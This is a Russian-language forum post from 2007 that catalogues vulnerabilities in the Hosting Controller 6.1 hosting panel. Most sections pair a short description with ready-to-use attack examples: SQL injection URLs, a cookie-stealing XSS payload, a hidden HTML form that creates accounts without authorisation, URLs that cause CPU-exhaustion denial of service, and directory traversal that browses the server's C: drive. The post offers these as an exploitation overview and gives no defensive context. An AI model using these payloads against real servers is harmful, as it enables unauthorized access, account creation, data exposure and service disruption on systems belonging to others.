Уязвимости в CMS Hosting Controller

Discussion in 'Веб-уязвимости' started by Solide Snake, 17 Dec 2007.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Привет:) Представляю вашему вниманию небольшой озбор уязвимостей в CMS Hosting Controller.

    Уязвимости в Hosting Controller


    Site: http://www.hostingcontroller.com

    Exploits/Shellcode

    Hosting Controller <= 0.6.1 Hotfix 1.4 Directory Browsing Vulnerability
    Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit
    Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)
    Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)
    Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit
    Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit
    Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability
    Hosting Controller <= 6.1 Hotfix 3.2 Remote Unauthenticated Vulns
    Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities


    Hosting Controller 6.1 Hotfix <= 3.2 SQL Injection

    1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "ForumID" в сценариях DisableForum.asp и EnableForum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
    Пример:

    Code:
    http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
    http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
    2. Уязвимость существует из-за ошибки проверки прав пользователя при доступе к определенным сценариям. Удаленный пользователь может создать и удалить виртуальные директории произвольных сайтов с помощью сценариев DisableForum.asp и EnableForum.asp.
    Пример:

    Code:
    http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
    http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=

    Hosting Controller v.6.1 & prior XSS

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "error" в сценарии error.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:

    Code:
    http://target:/admin/hosting/error.asp?error=<script>alert(document.cookie)</script>

    Обход ограничений безопасности в Hosting Controller 6.1 HotFix 2.2

    Уязвимость позволяет удаленному авторизованному пользователю добавить имена пользователей на системе.
    Удаленный авторизованный пользователь может послать специально сформированный HTTP запрос сценарию 'AccountActions.asp' и добавить имена пользователей на системе.

    Exploit

    1. Удаленный авторизованный пользователь может вызвать сценарий 'planmanagerstep1.asp' и добавить планы к своей учетной записи.

    2. Удаленный авторизованный пользователь может отредактировать и просмотреть планы, доступные на сервере.
    Примеры:

    Code:
    http://[target]/admin/hosting/plandetails.asp?hostcustid=[EVERY PLAN NUMBER!]
    http://[target]/admin/hosting/plandetails.asp?hostcustid=1 or 1=1 
    
    http://[target]/admin/hosting/editplanopt1.asp?planid=[EVERY PLAN NUMBER!]
    http://[target]/admin/hosting/editplanopt2.asp?planid=[EVERY PLAN NUMBER!] 
    3. Уязвимость обнаружена в сценарии 'IISActions.asp'. Удаленный авторизованный пользователь может создать домен или под-домен без квот.


    Hosting Controller 6.1 HotFix 2.1 SQL Injection

    Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольные SQL команды в базе данных приложения и вызвать отказ в обслуживании системы.

    1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии 'listreason.asp'. Удаленный авторизованный пользователь может выполнить произвольные SQL команды в базе данных приложения.
    Пример:

    Code:
    http://[target]/admin/accounts/listreason.asp?ListReaso n=tester'%20or%20'1'='1 
    2. Удаленный авторизованный пользователь может с помощью специально сформированного URL вызвать 100% загрузку процессора.
    Пример:

    Code:
    http://[target]/admin/hosting/editplanopt3.asp
    http://[target]/admin/AdminSettings/plansettings.asp?action=1
    http://[target]/admin/ hosting/planmanager.asp?action=3&planid=2
    http://[target]/admin/hosting/planmanager.asp
    http://[target]/admin/hosting/planmanager.asp?action=3&planid=1
    3. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении.
    Пример:

    Code:
    <FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
    < INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
    Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
    Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
    < INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
    < INPUT type="hidden" name="htype" value="27" id="htype5" >
    < INPUT type="hidden" name="choice" value="1" id="Hidden6" >
    Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
    < input type="submit" value="Make">
    < /FORM> 
    4. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL:

    Code:
    http://[target]/admin/hosting/dsp_newreseller.asp 
    5. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения.
    Пример:

    Code:
    'or'1'='1'or'1'='1

    Hosting Controller 6.1 HotFix 2.0 SQL Injection

    1. Уязвимость существует при обработке входных данных в параметре 'resourceid' сценария 'resellerresources.asp'. Удаленный авторизованный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
    Пример:

    Code:
    http://[target]/admin/hosting/resellerresources.asp?
    action=2&jresourceid=1%20or%201=1 
    2. Удаленный авторизованный пользователь может с помощью специально сформированного URL просмотреть данные других пользователей.
    Пример:

    Code:
    http://[target]/admin/hosting/plandetails.asp?hostcustid=[PlanID]

    Обход авторизации в Hosting Controller 6.1 Hotfix 1.9

    Уязвимость существует в сценарии 'admin/hosting/addsubsite.asp'. Удаленный пользователь может послать специально сформированные данные и создать нового пользователя и новую учетную запись хоста.
    Пример:

    Code:
    http://[target]/admin/hosting/addsubsite.asp?
    loginname=Mouse&password =123456 
    
    http://[target]:8077/hosting/addsubsite.asp?
    loginname=Mouse&password=123456

    Обход каталога в Hosting Controller v.6.1 Hotfix 1.4

    Обнаружена уязвимость в Hosting Controller. Удаленный авторизованный пользователь может просмотреть произвольные файлы на системе.

    Уязвимость существует в файлах 'Statsbrowse.asp' и 'Generalbrowser.asp' из-за некорректной фильтрации входных данных.
    Пример:

    Code:
    http://[target]/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0 
    http://[target]/admin/iis/Generalbrowse.asp?FilePath=C:\
     
    12 people like this.